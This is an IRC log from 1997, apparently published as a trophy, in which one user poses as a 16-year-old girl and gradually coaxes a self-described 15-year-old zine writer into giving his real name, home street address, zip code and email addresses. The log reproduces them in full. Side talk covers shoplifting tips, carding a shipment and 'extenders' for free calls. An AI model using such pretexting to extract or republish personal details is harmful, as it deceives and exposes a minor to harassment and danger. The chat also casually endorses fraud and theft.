[14:18] -LineFeed- ))/allOps\#phreak-=> well i gotta go my brothaz........i have to do my night
skewl algebra.......bye
[14:18] <ZeR0-HeX> yeah i am
<PcExpoKey> Cool
<PcExpoKey> I like!
[14:18] -digipimp-- ( Wa|| Ops: #phreak ) bye d00d
<PcExpoKey> hehe
[14:18] <ZeR0-HeX> who are you?
<PcExpoKey> A loyal reader
[14:18] -digipimp-- ( Wa|| Ops: #phreak ) oops...I'm slow
[14:18] -digipimp-- ( Wa|| Ops: #phreak ) scuse me...I used to be retarded when i was 3
[14:18] -darkcyde- [BX-Wall/#phreak] really? you too!?!?! l33t!
[14:19] -darkcyde- [BX-Wall/#phreak] i was retarded until yesterday!
<PcExpoKey> You going to the PCexpo?
[14:19] <ZeR0-HeX> um, where and when?
[14:19] -digipimp-- ( Wa|| Ops: #phreak ) I was 3 yesterday too!
<PcExpoKey> its in new york city
<PcExpoKey> www.pcexpo.com
[14:19] -darkcyde- [BX-Wall/#phreak] ELITE!!!!!!!!!!!!!!!!!!!!!
[14:19] <ZeR0-HeX> i live in CT
<PcExpoKey> :/
<PcExpoKey> Thats still pretty close
<PcExpoKey> Where abouts in CT?
<PcExpoKey> Im in Morris County NJ
[14:20] <ZeR0-HeX> nobody knows
[14:20] <ZeR0-HeX> just in CT
[14:20] <ZeR0-HeX> are you going?
<PcExpoKey> hehe
<PcExpoKey> Yup
<PcExpoKey> Its going to be cool
[14:20] <ZeR0-HeX> age/sex?
<PcExpoKey> On the east side or west side of ct?
<PcExpoKey> 16/F
<PcExpoKey> a/s?
[14:21] <ZeR0-HeX> in CT
[14:21] <ZeR0-HeX> i ain't telling
[14:21] <ZeR0-HeX> 15/M
<PcExpoKey> heh, ok
<PcExpoKey> I understand
<PcExpoKey> its raining here :/
[14:22] <ZeR0-HeX> here too
<PcExpoKey> Its like quick rain though
<PcExpoKey> Really hard and then it stops for a bit
[14:23] <ZeR0-HeX> brb
Session Close: Wed Jun 18 14:35:03 1997
Session Start: Fri Jun 20 14:42:13 1997
[14:42] <ZeR0-HeX> yeah
[14:42] <ZeR0-HeX> hey
[14:42] <ZeR0-HeX> sup
<Keystrike> Hey :)
<Keystrike> not much
<Keystrike> pcexpo was ok
[14:42] <ZeR0-HeX> oh
[14:42] <ZeR0-HeX> kool
<Keystrike> but, there wasnt anything new there or anything to phreak
[14:42] <ZeR0-HeX> oh
[14:42] <ZeR0-HeX> hehe
<Keystrike> whats new?
[14:43] <ZeR0-HeX> nothing much
<Keystrike> You going to BeyondHOPE?
[14:45] <ZeR0-HeX> uh
[14:45] <ZeR0-HeX> never heard of it
[14:45] <ZeR0-HeX> what is that?
<Keystrike> its a hacker conference
<Keystrike> www.hope.net
<Keystrike> sponsered by 2600 mag
<Keystrike> in nyc
<Keystrike> hmm
<Keystrike> Maybe you can talk there
[14:46] <ZeR0-HeX> oh
[14:46] <ZeR0-HeX> kewl
<Keystrike> Whats Phreak 13 gonna be about again?
[14:47] <ZeR0-HeX> when is it?
[14:47] <ZeR0-HeX> i might be able to go
[14:47] <ZeR0-HeX> huh?
<Keystrike> August
[14:47] <ZeR0-HeX> oh
[14:47] <ZeR0-HeX> like
*** Krusty is on IRC
[14:47] <ZeR0-HeX> say if you get caught shoplifting..
[14:47] <ZeR0-HeX> i'll give you a hundred ways to get out of it
<Keystrike> hehehe
<Keystrike> cool ;)
*** Krusty has left IRC
<Keystrike> think you can make it there?
<Keystrike> <speakers@hope.net>, if you're interested in speaking
<Keystrike> thats their email addy
<Keystrike> mail em!
-> [ZeR0-HeX] PING
<Keystrike> hello?
[14:50] <ZeR0-HeX> one sec.
<Keystrike> okay
[14:50] <ZeR0-HeX> can't really talk man
[14:50] <ZeR0-HeX> e-mail me
[14:50] <ZeR0-HeX> you no my addres
[14:50] <ZeR0-HeX> :-)
[14:50] <ZeR0-HeX> cya later
[14:50] <ZeR0-HeX> i might be able to go thoug'
[14:50] <ZeR0-HeX> www.hope.net
[14:50] <ZeR0-HeX> i'll check it out
[14:50] <ZeR0-HeX> cya
<Keystrike> k
<Keystrike> cya :)
[14:50] <ZeR0-HeX> k, cya
[14:50] <ZeR0-HeX> nice talkin' with ya
*** ZER0-HEX has left IRC
Session Close: Fri Jun 20 14:52:00 1997
Session Start: Tue Jun 24 21:02:33 1997
[21:02] <ZeR0-HeX> um
[21:02] <ZeR0-HeX> hi
[21:02] <ZeR0-HeX> do i know you?
<Keystrike> are u the zero hex who writes phreak magazine?
[21:04] <ZeR0-HeX> hello?
[21:05] <ZeR0-HeX> Go to www.createch.net/zerohex/zer0.html If you need any tips on Shoplifting,
Free Premium Channels, Free Phone Calls, Free Clothes, and many more things like these. This
is the site. Please sign the guestbook.
<Keystrike> hi
<Keystrike> yes
<Keystrike> i am pcexpokey
<Keystrike> member?
<Keystrike> 16/f....
[21:06] <ZeR0-HeX> i changed the name
[21:06] <ZeR0-HeX> to Zer0 Issues
[21:06] <ZeR0-HeX> Go to www.createch.net/zerohex/zer0.html If you need any tips on Shoplifting,
Free Premium Channels, Free Phone Calls, Free Clothes, and many more things like these. This
is the site. Please sign the guestbook.
[21:06] <ZeR0-HeX> go check it out
<Keystrike> cool
[21:06] <ZeR0-HeX> oh yeah
[21:06] <ZeR0-HeX> hey
[21:06] <ZeR0-HeX> sup
[21:07] <ZeR0-HeX> can you go to my web site
[21:07] <ZeR0-HeX> and sign my guestbook
[21:07] <ZeR0-HeX> and i'd appreciate it if you like told some of your friends bout my site
[21:07] <ZeR0-HeX> i know
[21:07] <ZeR0-HeX> say "age/sex"
[21:07] <ZeR0-HeX> go in #reality and do it
<Keystrike> sure
[21:07] <ZeR0-HeX> wow, 1st time a woman has ever been interested in this site
<Keystrike> hehe
[21:08] <ZeR0-HeX> :-)
[21:08] <ZeR0-HeX> :-)
Session Close: Tue Jun 24 21:12:07 1997
Session Start: Tue Jun 24 21:37:04 1997
[21:37] <ZeR0-HeX> dont' tell anyone
<Keystrike> I wont :)
<Keystrike> How can I verify it though?
[21:37] <ZeR0-HeX> first name is Faraz
[21:37] <ZeR0-HeX> last name is Alam
[21:37] <ZeR0-HeX> go to #teenflirters
[21:37] <ZeR0-HeX> ask people there
<Keystrike> Faraz?
<Keystrike> hehe
[21:37] <ZeR0-HeX> ask nancy
<Keystrike> ok
<Keystrike> I believe ya ;)
[21:37] <ZeR0-HeX> and bluejewel
[21:37] <ZeR0-HeX> uh huh
[21:37] <ZeR0-HeX> go in ther
[21:37] <ZeR0-HeX> e
<Keystrike> hmmm
<Keystrike> where in ct do you live?
[21:40] <ZeR0-HeX> near hartford
<Keystrike> hmmm
<Keystrike> i dont know ct very well ;)
[21:41] <ZeR0-HeX> i'll tell you the town and everything
[21:41] <ZeR0-HeX> if ur interested in sending me ur scanner
[21:41] <ZeR0-HeX> i dunno nj very well :-)
[21:41] <ZeR0-HeX> diana
[21:41] <ZeR0-HeX> seriously
[21:41] <ZeR0-HeX> you can trust me
[21:41] <ZeR0-HeX> i won't do anything
[21:41] <ZeR0-HeX> how bout this..
[21:41] <ZeR0-HeX> i'll even send you the money 1st, for the shipping
and all
<Keystrike> hmmmm
<Keystrike> well, if i have your addy and stuff, i suppose its pretty
safe :)
[21:42] <ZeR0-HeX> my address?
[21:42] <ZeR0-HeX> ok, but you can't tell anyone
<Keystrike> addy == address
<Keystrike> I wont
[21:42] <ZeR0-HeX> absolutely nobody
<Keystrike> but
<Keystrike> How can I be sure thats it?
[21:42] <ZeR0-HeX> uh huh
[21:42] <ZeR0-HeX> i no
<Keystrike> hehe
[21:42] <ZeR0-HeX> wait
[21:42] <ZeR0-HeX> what's ur last name?
[21:42] <ZeR0-HeX> 1st
[21:42] <ZeR0-HeX> :-)
[21:43] <ZeR0-HeX> same process over you
<Keystrike> not some drop off point
<Keystrike> hehe
<Keystrike> u want my stuff too?
<Keystrike> I guess you need that anyway so u can pay for the shipping
<Keystrike> right?
<Keystrike> My last name is...
<Keystrike> <drumb rool>
<Keystrike> roll rather
[21:44] <ZeR0-HeX> uh huh
[21:44] <ZeR0-HeX> u there?..
[21:44] <ZeR0-HeX> huh?
[21:44] <ZeR0-HeX> drumb rool?
[21:44] <ZeR0-HeX> haha
<Keystrike> Fitger
[21:44] <ZeR0-HeX> not funny
<Keystrike> sorry
[21:44] <ZeR0-HeX> :-)
[21:44] <ZeR0-HeX> whta is it really
<Keystrike> hehe
[21:44] <ZeR0-HeX> Diana Fitger
[21:44] <ZeR0-HeX> ??
<Keystrike> yup
* Keystrike is german
[21:45] <ZeR0-HeX> k
[21:45] <ZeR0-HeX> Faraz Alam here
[21:45] <ZeR0-HeX> hey
[21:45] <ZeR0-HeX> kewl
[21:45] <ZeR0-HeX> i was born in germany
[21:45] <ZeR0-HeX> frankfurt, amazing heh?
<Keystrike> cool :)
<Keystrike> hehehe
<Keystrike> Im like not all german though
<Keystrike> italian too
[21:45] <ZeR0-HeX> neither am I
[21:45] <ZeR0-HeX> i'm pakistani
<Keystrike> but thats my mothers side
[21:45] <ZeR0-HeX> :-)
<Keystrike> nifty :)
[21:45] <ZeR0-HeX> uh huh
[21:45] <ZeR0-HeX> ok
*** ^scream^ is on IRC
[21:46] <ZeR0-HeX> before i tell you everything bout me
<Keystrike> hehe
[21:46] <ZeR0-HeX> you will agree to send me the scanner then?
<Keystrike> yes =p
[21:46] <ZeR0-HeX> :-)
<Keystrike> im not sure how to ship it
<Keystrike> i have a handman too
<Keystrike> i can send that?
[21:46] -ec|ipse- (Wall:#Phreak) cawnf cawnf?
[21:47] <ZeR0-HeX> um..
[21:47] <ZeR0-HeX> hehe
[21:47] <ZeR0-HeX> whatever
[21:47] <ZeR0-HeX> the pic you have
[21:47] -shoelace- still on
[21:47] <ZeR0-HeX> a color scanner
[21:47] -shoelace- might be busted
[21:47] <ZeR0-HeX> would be all
<Keystrike> yes
<Keystrike> oke,y
[21:47] <ZeR0-HeX> k
[21:47] <ZeR0-HeX> what's that called?
[21:47] <ZeR0-HeX> ur color scanner?
<Keystrike> logitech i believe
<Keystrike> oh
<Keystrike> the flatbed is also color
[21:48] <ZeR0-HeX> oh
[21:48] <ZeR0-HeX> do i uh..
<Keystrike> its an hp 4c
[21:48] <ZeR0-HeX> have to insert photos
[21:48] <ZeR0-HeX> or just like click a button like you did
<Keystrike> its ez to use
[21:48] <ZeR0-HeX> and it takes a pic
<Keystrike> insert em
[21:48] <ZeR0-HeX> do i insert photos?
[21:48] <ZeR0-HeX> oh
[21:48] <ZeR0-HeX> damn
<Keystrike> yes
[21:48] <ZeR0-HeX> i don't have that many pics of me
[21:48] <ZeR0-HeX> :-(
[21:48] <ZeR0-HeX> yuo can't just like shoot it
<Keystrike> u can just take pics with a poloraid or whatever
[21:48] <ZeR0-HeX> at yourself
<Keystrike> well
<Keystrike> you can sorta
<Keystrike> put your head on the scanner
<Keystrike> and scan :P
[21:49] <ZeR0-HeX> you did didn't you?
[21:49] <ZeR0-HeX> yeah
[21:49] <ZeR0-HeX> you did that? ur holding that little button aren't
ya?
[21:49] <ZeR0-HeX> like a timer?
<Keystrike> well, that was the camera
[21:49] <ZeR0-HeX> oh, ok
[21:49] <ZeR0-HeX> hey
[21:49] <ZeR0-HeX> how bout this
[21:50] <ZeR0-HeX> um, go to the post office tomorow,
[21:50] <ZeR0-HeX> and ask them
[21:50] <ZeR0-HeX> how much it'd cost
[21:50] <ZeR0-HeX> to send it in a box or whatever
<Keystrike> i can look that up
[21:50] <ZeR0-HeX> yeah
<Keystrike> www.usps.gov
[21:50] <ZeR0-HeX> i think so
[21:50] <ZeR0-HeX> find a way
[21:50] <ZeR0-HeX> yeah
[21:50] <ZeR0-HeX> also
[21:50] <ZeR0-HeX> uh, fedex.com
[21:50] <ZeR0-HeX> or something
<Keystrike> yup
[21:50] <ZeR0-HeX> and uspostal.com
[21:51] <ZeR0-HeX> etc.
[21:51] <ZeR0-HeX> then uh..
[21:51] <ZeR0-HeX> hmm... can't really talk to you on the phone
[21:51] <ZeR0-HeX> unless you call
<Keystrike> the fedex people come to our house evey day
[21:51] <ZeR0-HeX> cause my parents won't allow women to call me on the phon
[21:51] <ZeR0-HeX> e
<Keystrike> cause we always send out packs
[21:51] <ZeR0-HeX> i can't even talk to um
<Keystrike> heheheehhehe
[21:51] <ZeR0-HeX> damn religion :-)
<Keystrike> why not?
[21:51] <ZeR0-HeX> oh, kool
[21:51] <ZeR0-HeX> it's just
[21:51] <ZeR0-HeX> really strict
<Keystrike> auu :/
[21:52] <ZeR0-HeX> we're not allowed to have relationships
<Keystrike> do they screen your calls?
[21:52] <ZeR0-HeX> at such an early age
[21:52] <ZeR0-HeX> it sucks
[21:52] <ZeR0-HeX> i no
[21:52] <ZeR0-HeX> so
[21:52] <ZeR0-HeX> tomorrow
[21:52] <ZeR0-HeX> just like ask the guy
[21:52] <ZeR0-HeX> how much it'd cost
[21:52] <ZeR0-HeX> they cause gotta weight it and all
[21:52] <ZeR0-HeX> huh?
<Keystrike> i can see on their site
[21:52] <ZeR0-HeX> no
[21:52] <ZeR0-HeX> not that strict
<Keystrike> its not that heavy
[21:52] <ZeR0-HeX> :-)
[21:52] <ZeR0-HeX> ok
<Keystrike> =p
[21:53] <ZeR0-HeX> fer honesty
[21:53] <ZeR0-HeX> can you call me?
[21:53] -Own3d- You have 2 notes waiting on Own3d.
[21:53] -Own3d- For a list, /MSG Own3d NOTES [pass] INDEX
[21:53] <ZeR0-HeX> or you can't calll long distance
<Keystrike> hmmm
*** ^scream^ has left IRC
<Keystrike> i could try an extender
[21:53] <ZeR0-HeX> k, cause i don't want you think that you can;t trust me
[21:53] <ZeR0-HeX> you can
<Keystrike> not sure if it will work to all over the us
[21:53] <ZeR0-HeX> or
[21:53] <ZeR0-HeX> how bout this
[21:53] <ZeR0-HeX> you just send it
[21:53] <ZeR0-HeX> then
*** ^scream^ is on IRC
[21:53] <ZeR0-HeX> when i send it back
[21:53] <ZeR0-HeX> i'll leave the cash in there
[21:53] <ZeR0-HeX> extender?
[21:54] <ZeR0-HeX> what's that?
<Keystrike> its like
<Keystrike> a way to make free calls and shit
[21:54] <ZeR0-HeX> oh
[21:54] <ZeR0-HeX> kool
[21:55] <ZeR0-HeX> do you have another phone line fer yer computer?
<Keystrike> yes
<Keystrike> but someones on it now
[21:55] <ZeR0-HeX> damn
[21:55] <ZeR0-HeX> u rich or something!
[21:55] <ZeR0-HeX> :-)
[21:55] <ZeR0-HeX> lucky woman
[21:55] <ZeR0-HeX> :-)
[21:55] <ZeR0-HeX> k
<Keystrike> hehe
<Keystrike> :)
<Keystrike> whats your zip code?
<Keystrike> it needs it to caculate the payment and stuff
[21:56] <ZeR0-HeX> 060...
[21:57] <ZeR0-HeX> :-)
[21:57] <ZeR0-HeX> ur at the web site
[21:57] <ZeR0-HeX> 06029
<Keystrike> http://www.fedex.com/svcform.html
<Keystrike> yuppers
[21:57] <ZeR0-HeX> kooll
[21:57] <ZeR0-HeX> k
[21:57] <ZeR0-HeX> that's my zip code
[21:57] <ZeR0-HeX> 06029
[21:57] <ZeR0-HeX> what's urs?
<Keystrike> 07960
[21:58] <ZeR0-HeX> you can like make out a bullshit order to someone you hate
[21:58] <ZeR0-HeX> 06029
<Keystrike> i dont think so
<Keystrike> it wants other stuff
<Keystrike> this is just like a caculator
[21:58] <ZeR0-HeX> oh
<Keystrike> im not doing the actual order thingy now
<Keystrike> EAST BERLIN , CT
<Keystrike> ?
[21:59] <ZeR0-HeX> lol..
[21:59] <ZeR0-HeX> damn..
<Keystrike> FedEx Economy Two-Day Service sm
<Keystrike> Service Commitment: Friday, 04:30 PM 06/27/97
[21:59] <ZeR0-HeX> ur one town away from where my girlfriend lives
[21:59] <ZeR0-HeX> she lives in Berlin CT
<Keystrike> thats what it said for your addy :P
<Keystrike> Origin: MORRISTOWN , NJ
<Keystrike> thats what it sayd for mine
[22:00] <ZeR0-HeX> that's not it
<Keystrike> heh
[22:00] <ZeR0-HeX> i live 40 min. away from her
[22:00] <ZeR0-HeX> my zip is 06029
<Keystrike> maybe thats the dropoff thing
[22:00] <ZeR0-HeX> and i live in ellington, ct
[22:00] <ZeR0-HeX> probably where fed ex is located
[22:00] <ZeR0-HeX> their main office
<Keystrike> yup
[22:01] <ZeR0-HeX> hmm
[22:01] <ZeR0-HeX> that thing is complex
[22:01] <ZeR0-HeX> :-)
[22:01] <ZeR0-HeX> lol
<Keystrike> damn
<Keystrike> this no work
[22:03] <ZeR0-HeX> huh?..
<Keystrike> the caculator
<Keystrike> it dosnt say a cost
<Keystrike> sec
[22:04] <ZeR0-HeX> yep
[22:04] <ZeR0-HeX> hey
[22:04] <ZeR0-HeX> if i got disconnected
[22:04] <ZeR0-HeX> e-mail me at zer0-hex@juno.com
[22:04] <ZeR0-HeX> ok?
[22:04] <ZeR0-HeX> or farazalam@juno.com
[22:04] <ZeR0-HeX> okkies?
[22:04] <ZeR0-HeX> or go to the web site
<Keystrike> ok
<Keystrike> why would u disconnect?
*** ^scream^ has left IRC
[22:05] <ZeR0-HeX> k
[22:05] <ZeR0-HeX> what's your e-mail address?
[22:05] <ZeR0-HeX> cause
[22:05] <ZeR0-HeX> my folks
[22:05] <ZeR0-HeX> they don't want me online
[22:05] <ZeR0-HeX> i'm home alone right now
[22:05] <ZeR0-HeX> and they're gonna come any min.
*** Krusty has left IRC
<Keystrike> If you mail your 10 pound 0 ounce Priority Mail package
<Keystrike> from MORRISTOWN, NJ 07960 to ELLINGTON, CT 06029 (zone 2),
<Keystrike> we estimate your package will arrive in 2 Day(s).
<Keystrike> The price is:
<Keystrike> Priority Mail Service $7.80
<Keystrike> Certified Mail $1.35
<Keystrike> Restricted Delivery $2.75
<Keystrike> Return Receipt $1.10
<Keystrike> -------------------------------------------
<Keystrike> TOTAL CHARGES $13.00
[22:22] <ZeR0-HeX> sup
[22:22] <ZeR0-HeX> what happened?
<Keystrike> hey
<Keystrike> 13 dollars
<Keystrike> wb
Session Start: Tue Jul 01 01:12:37 1997
[1:12] <ZeR0-HeX> hi!!!!!
[1:12] <ZeR0-HeX> what's up??
[1:12] <ZeR0-HeX> where have you been?
<Keystroke> I corrupted my bios
<Keystroke> heh
[1:13] <ZeR0-HeX> GOOD JOB
[1:13] <ZeR0-HeX> :-)
[1:13] <ZeR0-HeX> hey
[1:13] <ZeR0-HeX> what's ur e-mail address?
[1:13] <ZeR0-HeX> my web site is gone :-(
<Keystroke> :(
<Keystroke> Why?
[1:13] <ZeR0-HeX> cause
<Keystroke> wakka@hotmail.com
<Keystroke> why?
[1:13] <ZeR0-HeX> my web hosting service wan't making enuff
[1:13] <ZeR0-HeX> money
<Keystroke> heheh
<Keystroke> :((
<Keystroke> damn
[1:14] <ZeR0-HeX> i put up 3 more issues though
<Keystroke> did u sign a contract or anything?
[1:14] <ZeR0-HeX> you want me to dcc them to you?
[1:14] <ZeR0-HeX> k, thanks
<Keystroke> do you have em on a site now?
[1:14] <ZeR0-HeX> you know mine
[1:14] <ZeR0-HeX> awww
[1:14] <ZeR0-HeX> it'll go back up
[1:14] <ZeR0-HeX> i gotta find somewhere
[1:14] <ZeR0-HeX> no
<Keystroke> cool
[1:14] <ZeR0-HeX> nope
[1:15] <ZeR0-HeX> i'm looking fer something better than angelfire and geocities
<Keystroke> your isp?
<Keystroke> aol or ibm?
[1:15] <ZeR0-HeX> they both suck
[1:15] <ZeR0-HeX> hey, did you find anything bout fed-e
[1:15] <ZeR0-HeX> x
<Keystroke> 13$ us post
[1:16] <ZeR0-HeX> and the prices?
[1:16] <ZeR0-HeX> carded
<Keystroke> carded?
[1:16] <ZeR0-HeX> :-)
[1:16] <ZeR0-HeX> oh
[1:16] <ZeR0-HeX> what bout back?
<Keystroke> does #reality have a page?
<Keystroke> same thing
[1:17] <ZeR0-HeX> uh huh, i don't pay fer it. i ripped it off
<Keystroke> 13 dollars
<Keystroke> heh
<Keystroke> what if they confiscate my scanner?!
[1:17] <ZeR0-HeX> oh
[1:17] <ZeR0-HeX> k
[1:17] <ZeR0-HeX> why would they?
<Keystroke> if it was carded
<Keystroke> hehah
[1:17] <ZeR0-HeX> it's illegal. you can sue them for going through your mail
[1:17] <ZeR0-HeX> what?
[1:17] <ZeR0-HeX> lol
<Keystroke> heh
<Keystroke> want i call ya?
[1:18] <ZeR0-HeX> funny woman
[1:18] <ZeR0-HeX> :-)
[1:18] <ZeR0-HeX> huh?
<Keystroke> heh
<Keystroke> funny?
[1:18] <ZeR0-HeX> u wanna gimme a call?
<Keystroke> why not?
<Keystroke> hehe
[1:18] <ZeR0-HeX> lol
[1:18] <ZeR0-HeX> well, now, diana, i don't think we should start anything. i do have a
girlfriend and all
[1:19] <ZeR0-HeX> :-)
<Keystroke> hehe
[1:19] <ZeR0-HeX> j/k
<Keystroke> :p
[1:19] <ZeR0-HeX> seriousl though, could you call me?
<Keystroke> hmmm
<Keystroke> i guess
[1:21] <ZeR0-HeX> brb
[1:21] <ZeR0-HeX> ok?
<Keystroke> k
[1:23] <ZeR0-HeX> ok
[1:23] <ZeR0-HeX> backers
[1:23] <ZeR0-HeX> so
[1:23] <ZeR0-HeX> uh
[1:23] <ZeR0-HeX> the scanner
[1:23] <ZeR0-HeX> what do you wanna do?
<Keystroke> mail
<Keystroke> us post
[1:24] <ZeR0-HeX> us postal or fed-ex
[1:24] <ZeR0-HeX> ??
<Keystroke> us postal
[1:25] <ZeR0-HeX> ok
[1:26] <ZeR0-HeX> so, ur up fer it and all?
<Keystroke> yup
<Keystroke> hehe
[1:26] <ZeR0-HeX> ok
[1:26] <ZeR0-HeX> um
[1:26] <ZeR0-HeX> 1st, you have to trust me.
<Keystroke> i do
[1:27] <ZeR0-HeX> so, we need to talk on the phone so you think i won't rip you off
<Keystroke> ok
[1:27] <ZeR0-HeX> no'
[1:27] <ZeR0-HeX> just in case
[1:27] <ZeR0-HeX> r u sure?
[1:27] <ZeR0-HeX> absolutely? positively?
<Keystroke> umm hmm
<Keystroke> hehe
[1:27] <ZeR0-HeX> even though i make texts bout shoplifting :-)
<Keystroke> hah
<Keystroke> :P
[1:27] <ZeR0-HeX> see
<Keystroke> k
[1:28] <ZeR0-HeX> you still don't trust me
[1:28] <ZeR0-HeX> that's why we gotta talk over da fone
<Keystroke> I do
[1:28] <ZeR0-HeX> ok
[1:28] <ZeR0-HeX> just one thing
[1:28] <ZeR0-HeX> um
[1:28] <ZeR0-HeX> i'm not gonna be home this week
[1:28] <ZeR0-HeX> i'm leaving on thursday to PA
[1:28] <ZeR0-HeX> and am coming back on next monday
[1:28] <ZeR0-HeX> so uh..
<Keystroke> yes?
[1:29] <ZeR0-HeX> how do you want me to give you the money and all?
<Keystroke> ship it back in the scanner box
[1:29] <ZeR0-HeX> ok
[1:29] <ZeR0-HeX> it'll cost me 13 bucks too?
[1:29] <ZeR0-HeX> by us postal?
[1:29] <ZeR0-HeX> or what?
<Keystroke> yup :/
[1:30] <ZeR0-HeX> ok
[1:30] <ZeR0-HeX> can it be anything else?
[1:30] <ZeR0-HeX> or does it HAVE to be us post?
<Keystroke> well thats the cheapest
[1:30] <ZeR0-HeX> thank you for the 3 werd answers btw :-)
[1:30] <ZeR0-HeX> ok
[1:30] <ZeR0-HeX> how many days can i borrow it?
<Keystroke> np
<Keystroke> a week
<Keystroke> :P
[1:31] <ZeR0-HeX> thanks!!!
[1:31] <ZeR0-HeX> :-)
<Keystroke> np
[1:31] <ZeR0-HeX> $26 bucks is a good deal i gess
<Keystroke> tis ;)
[1:31] <ZeR0-HeX> r u giving me 2 scanners or what?
<Keystroke> 1
<Keystroke> giving?! :P
[1:31] <ZeR0-HeX> i mean
[1:31] <ZeR0-HeX> borrowing!!
[1:31] <ZeR0-HeX> you no what i mean
[1:32] <ZeR0-HeX> i won't rip you off!!
[1:32] <ZeR0-HeX> trust me!!
[1:32] <ZeR0-HeX> does it only scan pictures or what? cause i don't have any pics! or is it like
a timed one, where you can just point it and it'll shoot
<Keystroke> it scans all
[1:33] <ZeR0-HeX> ok, kool
[1:33] <ZeR0-HeX> color right?
[1:33] <ZeR0-HeX> like the picture you have?
<Keystroke> yes
[1:33] <ZeR0-HeX> ok, kool
[1:34] <ZeR0-HeX> when r u gonna send it??
<Keystroke> hmmm
<Keystroke> soon
<Keystroke> whats your #
<Keystroke> well
<Keystroke> when u need it?
[1:35] <ZeR0-HeX> #? phone #
[1:35] <ZeR0-HeX> is it next day air?
<Keystroke> yes
[1:35] <ZeR0-HeX> or what?
<Keystroke> yes
[1:36] <ZeR0-HeX> oh, ok.....
[1:36] <ZeR0-HeX> hmm..
[1:36] <ZeR0-HeX> well uh.
[1:36] <ZeR0-HeX> k, i got an idea
<Keystroke> yes?
[1:36] <ZeR0-HeX> think you can send it out tomorrow?
<Keystroke> uhmmmmm
<Keystroke> yes
[1:37] <ZeR0-HeX> do you have like a box and all?
<Keystroke> yes
<Keystroke> :P
<Keystroke> hehehe
[1:38] <ZeR0-HeX> what/?
[1:38] <ZeR0-HeX> what's os funny bout that
[1:38] <ZeR0-HeX> hehe
<Keystroke> i keep saying yes :P
[1:39] <ZeR0-HeX> oh, :-)
[1:39] <ZeR0-HeX> ok
[1:39] <ZeR0-HeX> so i gess you must want my address then huh?
[1:41] <ZeR0-HeX> i gess not
[1:41] <ZeR0-HeX> :-)
<Keystroke> sorry
<Keystroke> :)
<Keystroke> I was finding something
<Keystroke> a txt file
[1:44] <ZeR0-HeX> its ok
<Keystroke> its very important and i lost it
<Keystroke> brb
[1:45] <ZeR0-HeX> oh ok, take ur time
<Keystroke> yes!
<Keystroke> found it
[1:45] <ZeR0-HeX> :-)
[1:46] <ZeR0-HeX> what is it? if you don't mind me asking?
<Keystroke> someone sent it to me who was going on vacation
<Keystroke> and told me to give it to someone else
<Keystroke> by today :(
<Keystroke> and cause my puter was broken, well....
[1:46] <ZeR0-HeX> oh
<Keystroke> didnt get a chance to
[1:47] <ZeR0-HeX> sowwery :-(
<Keystroke> I found it now :)
[1:47] <ZeR0-HeX> do you already have my address?
<Keystroke> nope
[1:47] <ZeR0-HeX> k
[1:48] <ZeR0-HeX> gimme yours right after
[1:48] <ZeR0-HeX> don't send me a bomb
[1:48] <ZeR0-HeX> :-)
<Keystroke> heheheh
<Keystroke> Maybe not :P
<Keystroke> j/k
[1:48] <ZeR0-HeX> k
[1:48] <ZeR0-HeX> here it is : Faraz Alam
[1:48] <ZeR0-HeX> 9 Deerfield Dr.
[1:48] <ZeR0-HeX> Ellington, CT 06029
<Keystroke> okey
[1:48] <ZeR0-HeX> don't
[1:48] <ZeR0-HeX> wait.....
<Keystroke> 192 Market Street
<Keystroke> yes?
<Keystroke> market street sucks
[1:49] <ZeR0-HeX> is it gonna be deliveried during the daytime?
[1:49] <ZeR0-HeX> what time?
[1:49] <ZeR0-HeX> do you know?
<Keystroke> umm hmm
<Keystroke> when your mail comes?
[1:49] <ZeR0-HeX> oh
[1:49] <ZeR0-HeX> it comes then
[1:49] <ZeR0-HeX> ok
[1:49] <ZeR0-HeX> cause
[1:49] <ZeR0-HeX> remembe
[1:49] <ZeR0-HeX> r
[1:49] <ZeR0-HeX> my religion
[1:49] <ZeR0-HeX> my parents would be pissed if they saw a girls' name a on my letter
<Keystroke> hehe
<Keystroke> Ill write Bubba
<Keystroke> from bubba
[1:50] <ZeR0-HeX> (thinks he found a homepage fer his issues..)
[1:50] <ZeR0-HeX> um
[1:50] <ZeR0-HeX> how bout this
[1:50] <ZeR0-HeX> have your address on it
[1:50] <ZeR0-HeX> but right a guys name
[1:50] <ZeR0-HeX> ok?
<Keystroke> ok
<Keystroke> cool
<Keystroke> url?
[1:50] <ZeR0-HeX> can you do that?
[1:51] <ZeR0-HeX> www.tripod.com
[1:51] <ZeR0-HeX> still looking
<Keystroke> yup
[1:51] <ZeR0-HeX> i need something that allows illegal activities
<Keystroke> hmmmm
[1:51] <ZeR0-HeX> or else they terminate it in a day after viewing it
<Keystroke> something?
<Keystroke> they?
[1:52] <ZeR0-HeX> iv.Pages that promote illegal activity.
[1:52] <ZeR0-HeX> the isp
[1:52] <ZeR0-HeX> damn
<Keystroke> i c :)
[1:52] <ZeR0-HeX> hmmm...
[1:52] <ZeR0-HeX> i'll take a chance and build the web site
[1:52] <ZeR0-HeX> see what happens
[1:52] <ZeR0-HeX> ok
<Keystroke> hehe
[1:52] <ZeR0-HeX> go on with ur address
<Keystroke> good luck
[1:53] <ZeR0-HeX> thanks :-)
<Keystroke> np
<Keystroke> ok
<Keystroke> i go address the box now
<Keystroke> bbl :)
[1:53] <ZeR0-HeX> huh?
[1:53] <ZeR0-HeX> gimme ur address
[1:53] <ZeR0-HeX> ur gonna make the box now?
[1:53] <ZeR0-HeX> at 1:54 am? :-)
Session Close: Tue Jul 01 02:14:31 1997
Session Start: Fri Jul 11 14:29:07 1997
[14:29] <ZeR0-HeX> heyyyyyyyyyyyyyyyyyyyy!!!!!!!
* Keystrike is away *BRB*
[14:29] <ZeR0-HeX> ok
[14:29] <ZeR0-HeX> you better!! i need to talk to you!!
Session Close: Fri Jul 11 14:30:21 1997
Session Start: Fri Jul 11 14:37:01 1997
[14:37] <ZeR0-HeX> back yet?
Session Close: Fri Jul 11 14:39:49 1997
Session Start: Fri Jul 11 14:59:30 1997
[14:59] <ZeR0-HeX> u there?
Session Close: Fri Jul 11 14:59:38 1997
Session Start: Fri Jul 11 16:04:03 1997
[16:04] <ZeR0-HeX> hi, u there?
Session Close: Fri Jul 11 16:04:24 1997
Session Start: Fri Jul 11 16:19:04 1997
[16:19] <ZeR0-HeX> hey u there???????!~!!!!!!!!!!
Session Close: Fri Jul 11 16:19:09 1997
2. sho.log - shoelace telling Keystroke about his visit from the SS.
[9:49] *** shoelace (funkdat@bull-max43.dynamic.usit.net) has joined #DowNINit
